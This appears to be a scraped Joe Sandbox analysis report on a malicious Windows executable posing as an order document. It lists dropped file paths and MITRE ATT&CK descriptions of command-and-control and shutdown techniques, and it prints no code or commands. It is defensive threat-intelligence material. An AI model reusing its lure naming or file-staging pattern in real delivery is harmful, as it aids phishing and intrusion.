Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Dybdemaaler100\Reservationsseddelen\Sandwichmnd\network-workgroup-symbolic.svg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate\Teknologiarbejderne5.Int

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\undertaking.Emp

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre